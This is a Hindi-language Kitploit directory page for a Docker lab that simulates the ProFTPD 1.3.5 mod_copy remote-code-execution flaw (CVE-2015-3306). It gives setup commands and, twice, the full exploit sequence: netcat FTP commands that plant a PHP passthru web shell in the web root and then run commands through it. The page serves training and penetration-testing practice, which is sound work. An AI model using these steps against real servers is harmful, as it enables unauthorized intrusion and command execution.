Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 - ProFTPD - RCE होम लैब सेटअप (Docker) Red Teaming या Penetration Testing के लिए उपयोग में आसान | Kitploit
उपकरण/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगलैब और अभ्यास
GitHubnetw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 - ProFTPD - RCE होम लैब सेटअप (Docker) Red Teaming या Penetration Testing के लिए उपयोग में आसान

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ProFTPD 1.3.5 (mod_copy) — RCE सिमुलेशन लैब

CVE20153306

यह लैब CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE भेद्यता का अनुकरण करने के लिए डिज़ाइन की गई है।
ProFTPD के mod_copy मॉड्यूल के माध्यम से Web Shell Injection RCE सीखने के लिए उपयोग की जाती है।


विशेषताएँ

  • असुरक्षित ProFTPD 1.3.5
  • mod_copy पूर्ण रूप से सक्षम (SITE CPFR / SITE CPTO)
  • Anonymous FTP का समर्थन
  • web root /var/www/html का अनुकरण करने के लिए Apache2 + PHP5
  • हमलावर SITE CPFR/CPTO का उपयोग करके RCE ट्रिगर करने के लिए फ़ाइल को webroot पर कॉपी कर सकते हैं
  • कंटेनर प्रारंभ होने पर सिस्टम हर बार स्वतः flag_RANDOM.txt उत्पन्न करता है
  • CTF / Red Team / Pentest प्रशिक्षण के लिए लैब

निर्देशिका संरचना

root@kitploit:~
/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh

उपयोग (Run Container)

root@kitploit:~
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab

CVE-2015-3306 भेद्यता का परीक्षण कैसे करें

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

वेब के माध्यम से खोलें:

root@kitploit:~
http://<IP>/webshell.php?cmd=<command>

फ़्लैग

इसमें संग्रहीत है:

root@kitploit:~
/tmp/flag_RANDOM.txt

अंग्रेज़ी संस्करण — ProFTPD 1.3.5 (mod_copy) RCE लैब

यह लैब mod_copy के साथ ProFTPD 1.3.5 का उपयोग करके CVE-2015-3306 का अनुकरण करती है, जिससे हमलावर ProFTPD mod_copy Remote File Copy to RCE कर सकते हैं।


विशेषताएँ

  • स्रोत से संकलित असुरक्षित ProFTPD 1.3.5
  • mod_copy सक्षम (SITE CPFR + SITE CPTO)
  • Anonymous FTP पहुँच
  • webshell निष्पादन के लिए Apache2 + PHP5
  • कंटेनर प्रारंभ पर स्वतः-उत्पन्न flag_RANDOM.txt
  • CTF, शिक्षा और एक्सप्लॉइट अनुसंधान के लिए उपयुक्त

एक्सप्लॉइट परीक्षण उदाहरण

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

फिर निष्पादित करें:

root@kitploit:~
http://<IP>/webshell.php?cmd=<command>

फ़्लैग स्थान

root@kitploit:~
/tmp/flag_RANDOM.txt

अस्वीकरण

केवल शैक्षिक और अधिकृत पेनिट्रेशन परीक्षण के लिए।

टूल डाउनलोड करें